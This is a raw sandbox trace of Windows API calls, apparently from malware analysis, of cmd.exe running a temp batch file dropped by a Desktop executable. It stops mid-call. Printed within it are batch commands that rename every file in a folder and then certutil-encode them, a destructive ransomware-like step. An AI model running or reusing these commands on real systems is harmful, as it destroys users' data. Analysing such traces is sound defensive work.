_vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0290.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.982] GetFileType (hFile=0x50) returned 0x2 [0290.982] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0290.982] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0291.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.087] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0291.168] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0291.168] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads") returned 0x19 [0291.168] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Downloads") returned 25 [0291.168] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0291.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.168] GetFileType (hFile=0x50) returned 0x2 [0291.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.168] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0291.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.237] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x1a) returned 1 [0291.312] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0291.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.312] GetFileType (hFile=0x50) returned 0x2 [0291.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.312] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0291.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0291.502] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0291.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.502] GetFileType (hFile=0x50) returned 0x2 [0291.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.502] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0291.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.570] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0291.646] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*) do ") returned 7 [0291.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.646] GetFileType (hFile=0x50) returned 0x2 [0291.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.646] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0291.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.752] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0291.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.826] GetFileType (hFile=0x50) returned 0x2 [0291.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.826] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0291.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.908] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95910*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c95910*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0291.992] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%a\" \"%~a.Sister\" ") returned 19 [0291.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0291.992] GetFileType (hFile=0x50) returned 0x2 [0291.992] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0291.992] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.189] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x13) returned 1 [0292.236] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9e8 | out: _Buffer=" & ") returned 3 [0292.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.236] GetFileType (hFile=0x50) returned 0x2 [0292.236] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.236] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0292.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.236] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0292.237] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe9b8 | out: _Buffer="for") returned 3 [0292.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.237] GetFileType (hFile=0x50) returned 0x2 [0292.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.237] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.238] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x3) returned 1 [0292.238] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" %a in ") returned 7 [0292.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.238] GetFileType (hFile=0x50) returned 0x2 [0292.238] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.238] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.239] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x7) returned 1 [0292.239] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.239] GetFileType (hFile=0x50) returned 0x2 [0292.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.239] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.240] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x55) returned 1 [0292.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.254] GetFileType (hFile=0x50) returned 0x2 [0292.254] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.254] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0292.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.255] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c959d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c959d0*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0292.255] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%~a.Sister\" \"%~na.bat\" ") returned 25 [0292.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.255] GetFileType (hFile=0x50) returned 0x2 [0292.255] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.256] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0292.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.256] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x19) returned 1 [0292.256] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0292.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.257] GetFileType (hFile=0x50) returned 0x2 [0292.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.257] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0292.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.257] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0292.266] malloc (_Size=0xffce) returned 0x21ed8e90940 [0292.266] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0292.266] GetProcessHeap () returned 0x21ed8c70000 [0292.266] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb80 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95aa0 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c957c0 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95520 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95520, Size=0x16) returned 0x21ed8c95940 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95940) returned 0x16 [0292.267] GetProcessHeap () returned 0x21ed8c70000 [0292.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95760 [0292.267] FindFirstFileExW (in: lpFileName="*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cc40 [0292.268] FindNextFileW (in: hFindFile=0x21ed8c7cc40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="..", cAlternateFileName="")) returned 1 [0292.270] FindNextFileW (in: hFindFile=0x21ed8c7cc40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0292.270] FindNextFileW (in: hFindFile=0x21ed8c7cc40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0292.270] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0292.271] GetLastError () returned 0x12 [0292.271] GetProcessHeap () returned 0x21ed8c70000 [0292.271] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95760) returned 1 [0292.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.271] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0292.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.272] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0292.272] _get_osfhandle (_FileHandle=0) returned 0x4c [0292.272] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0292.272] SetConsoleInputExeNameW () returned 0x1 [0292.272] GetConsoleOutputCP () returned 0x1b5 [0292.273] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0292.273] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.274] ??_V@YAXPEAX@Z () returned 0x1 [0292.274] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0292.274] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0292.274] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.274] SetFilePointer (in: hFile=0x3c, lDistanceToMove=511, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ff [0292.274] GetProcessHeap () returned 0x21ed8c70000 [0292.274] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95940) returned 1 [0292.274] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c957c0) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95aa0) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb80) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bee0) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c959c0) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96c40) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96340) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95740) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ce20) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96a00) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96040) returned 1 [0292.275] GetProcessHeap () returned 0x21ed8c70000 [0292.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc86d0) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95900) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95f80) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c957a0) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a60) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ca60) returned 1 [0292.276] GetProcessHeap () returned 0x21ed8c70000 [0292.276] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96280) returned 1 [0292.276] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.276] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ff [0292.276] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x2fe, lpOverlapped=0x0) returned 1 [0292.277] SetFilePointer (in: hFile=0x3c, lDistanceToMove=513, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x201 [0292.277] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0292.277] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.277] GetFileType (hFile=0x3c) returned 0x1 [0292.277] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.277] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x201 [0292.277] GetProcessHeap () returned 0x21ed8c70000 [0292.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.278] GetProcessHeap () returned 0x21ed8c70000 [0292.278] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.278] _tell (_FileHandle=3) returned 513 [0292.278] _close (_FileHandle=3) returned 0 [0292.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0292.279] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0292.279] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.279] SetFilePointer (in: hFile=0x3c, lDistanceToMove=513, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x201 [0292.280] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.280] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x201 [0292.280] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x2fc, lpOverlapped=0x0) returned 1 [0292.280] SetFilePointer (in: hFile=0x3c, lDistanceToMove=577, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x241 [0292.280] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=64, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 64 [0292.280] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.280] GetFileType (hFile=0x3c) returned 0x1 [0292.280] _get_osfhandle (_FileHandle=3) returned 0x3c [0292.280] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x241 [0292.280] GetProcessHeap () returned 0x21ed8c70000 [0292.280] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.281] GetProcessHeap () returned 0x21ed8c70000 [0292.281] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0292.281] _wcsicmp (_String1="for", _String2=")") returned 61 [0292.281] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0292.281] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0292.281] GetProcessHeap () returned 0x21ed8c70000 [0292.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96a00 [0292.281] GetProcessHeap () returned 0x21ed8c70000 [0292.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cb20 [0292.282] GetProcessHeap () returned 0x21ed8c70000 [0292.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e90 [0292.282] GetProcessHeap () returned 0x21ed8c70000 [0292.282] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x18) returned 0x21ed8c95780 [0292.282] GetProcessHeap () returned 0x21ed8c70000 [0292.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95780) returned 0x18 [0292.282] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0292.282] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0292.282] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0292.282] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0292.282] _wcsicmp (_String1="IN", _String2="in") returned 0 [0292.282] GetProcessHeap () returned 0x21ed8c70000 [0292.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45d10 [0292.282] _wcsicmp (_String1="DO", _String2="do") returned 0 [0292.282] _wcsicmp (_String1="certutil", _String2=")") returned 58 [0292.282] _wcsicmp (_String1="FOR", _String2="certutil") returned 3 [0292.282] _wcsicmp (_String1="FOR/?", _String2="certutil") returned 3 [0292.282] _wcsicmp (_String1="IF", _String2="certutil") returned 6 [0292.282] _wcsicmp (_String1="IF/?", _String2="certutil") returned 6 [0292.283] _wcsicmp (_String1="REM", _String2="certutil") returned 15 [0292.283] _wcsicmp (_String1="REM/?", _String2="certutil") returned 15 [0292.283] GetProcessHeap () returned 0x21ed8c70000 [0292.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96880 [0292.283] GetProcessHeap () returned 0x21ed8c70000 [0292.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e00 [0292.283] GetProcessHeap () returned 0x21ed8c70000 [0292.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bee0 [0292.283] _tell (_FileHandle=3) returned 577 [0292.283] _close (_FileHandle=3) returned 0 [0292.283] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, 